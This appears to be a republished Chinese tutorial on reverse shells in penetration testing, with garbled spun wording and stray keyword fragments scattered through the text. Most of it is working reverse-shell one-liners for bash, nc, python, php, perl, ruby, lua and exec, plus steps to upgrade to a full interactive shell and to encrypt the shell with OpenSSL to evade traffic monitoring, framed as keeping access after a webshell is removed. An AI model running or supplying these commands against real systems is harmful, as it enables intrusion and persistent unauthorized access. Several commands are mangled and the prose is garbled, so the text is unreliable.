哪些是shell

shell是渗透中常用的名词,像getshell,webshell,大跌shell等等,都和shell相关。

百度百科解释的shell:

在计算机科学中,Shell也称壳(拿来区别于核),是指“为使用者提供操作界

面”的软件(命令解析器)。它类似于DOS下的和后来的

cmd.exe。它接收用户命令,之后调用相应的应用程序。

简单说用户通过壳访问操作系统内核的服务,也就是由壳到内核,执行系统命令。

getshell:获取到目标的命令执行权限

webshell:指网站侧门linux 内核 sprintf,通过web服务进行命令执行

大跌shell:把命令行的输入输出转移到其它主机

为何要大跌shell

1、webshell下执行命令不交互,为了便捷加壳或其它操作必需要大跌shell。

2、反弹shell相当于新增一个侧门,当webshell被发觉删掉后权限不会遗失。

常用linux大跌shell的方法

使用whereis命令去确定目标支持的回调技巧。

 whereis nc bash python php exec lua perl ruby

登录后复制

linux 内核 sprintf_内核sprintf_内核管理器

linux 内核 sprintf_内核sprintf_内核管理器

bash大跌shell

bash回调是实战中用的最多的方式

nc -lvp 9999
bash -i >& /dev/tcp/ip/port 0>&1

登录后复制

把命令拆开剖析:

1、bash-i代表在本地打开一个bash

2、/dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,构建一个socket联接

3、>&旁边跟上/dev/tcp/ip/port这个文件代表将标准输出和标准错误输出重定向到这个文件,也就是传递到远程vps

4、远程vps开启对应的端口去窃听,都会接收到这个bash的标准输出和标准错误输出。

nc大跌shell

须要目标主机安装了nc

nc ip port -e /bin/sh

登录后复制

使用其他版本的nc

nc.traditional ip port -e /bin/sh

登录后复制

linux 内核 sprintf_内核管理器_内核sprintf

内核sprintf_linux 内核 sprintf_内核管理器

配合命名管线进行大跌:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1 | nc ip port >/tmp/f

登录后复制

python大跌shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.1.1.1",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

登录后复制

首先使用socket与远程构建起联接,接出来使用到了os库的dup2方式将标准输入、标准输出、标准错误输出重定向到远程,dup2这个方式有两个参数,分别为文件描述符fd1和fd2,当fd2参数存在时,就关掉fd2,之后将fd1代表的那种文件强行复制给fd2linux之家,在这儿可以把fd1和fd2看作是C语言里的表针,将fd1形参给fd2,就相当于将fd2指向于s.fileno(),fileno()返回的是一个文件描述符,在这儿也就是构建socket联接返回的文件描述符,复印下来数值为3

0代表标准输入、1代表标准输出、2代表标准错误输出、3代表重定向到远程

接出来使用os的subprocess在本地开启一个子进程,传入参数“-i”使bash以交互模式启动,标准输入、标准输出、标准错误输出又被重定向到了远程,这样的话就可以在远程执行输入命令了。

php大跌shell

linux 内核 sprintf_内核sprintf_内核管理器

须要php关掉safe_mode选项,才可以使用exec函数。

使用php的exec函数执行方式1大跌shell的命令

php- 'exec("/bin/bash -i >& /dev/tcp/ip/port")'

登录后复制

使用php的fsockopen去大跌shell

php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i &3 2>&3");'

登录后复制

其它大跌方式

exec大跌

0<&196;exec 196/dev/tcp/ip/port; sh &196 2>&196

登录后复制

perl大跌

perl -e 'use Socket;$i="ip";$p=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

登录后复制

ruby大跌

ruby -rsocket -e'f=TCPSocket.open("ip",port).to_i;exec sprintf("/bin/sh -i &%d 2>&%d",f,f,f)'

登录后复制

lua大跌

lua -e "require('socket');require('os');t=socket.tcp();t:connect('ip','port');os.execute('/bin/sh -i &3 2>&3');"

登录后复制

内核管理器_linux 内核 sprintf_内核sprintf

获取一个完全交互shell

通过上述命令大跌shell得到的shell并不能称为完全交互的shell,一般称之为'哑'shell。

一般存在以下缺点

因而有必要去获取一个完全交互的shell。

1、在shell中执行python,使用pty模块,创建一个原生的终端,命令如下:

python -c 'import pty; pty.spawn("/bin/bash")'

登录后复制

隐藏

运行完后

2、键入Ctrl-Z暂停任务,切回到VPS的命令行中;在VPS中执行:

stty raw -echo 
fg #将后台运行或挂起的任务切换到前台运行

登录后复制

内核管理器_内核sprintf_linux 内核 sprintf

3、在shell中执行,得到一个完全交互的shell,支持命令补全、历史命令查看、语法高亮、vim编辑等功能。

reset
export SHELL=bash
export TERM=xterm-256color
stty rows 54 columns 104

登录后复制

内核管理器_内核sprintf_linux 内核 sprintf

内核sprintf_linux 内核 sprintf_内核管理器

SSL流量加密

部份防护设备会对内外网传输流量进行审查,大跌shell执行命令都是以明文进行传输的linux 内核 sprintflinux 命令,很容易被查杀。

因而须要将原始流量使用openssl加密,绕开流量审计设备。

1、首先vps上生成SSL证书的私钥/公钥对,信息懒得填,仍然回车即可。

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

登录后复制

linux 内核 sprintf_内核sprintf_内核管理器

2、vps使用OpenSSL窃听一个端口

openssl s_server -quiet -key key.pem -cert cert.pem -port 8888

登录后复制

内核sprintf_linux 内核 sprintf_内核管理器

3、目标主机执行回调加密shell

mkfifo /tmp/s; /bin/bash -i &1 | openssl s_client -quiet -connect ip:port > /tmp/s; rm /tmp/s

登录后复制

内核sprintf_linux 内核 sprintf_内核管理器

大跌成功,成功接收到ssl流量加密的shell。

内核管理器_内核sprintf_linux 内核 sprintf

参考链接

以上就是深入了解 shell:渗透中常用名词解析及应用场景的详细内容,更多请关注小闻网其它相关文章!

声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。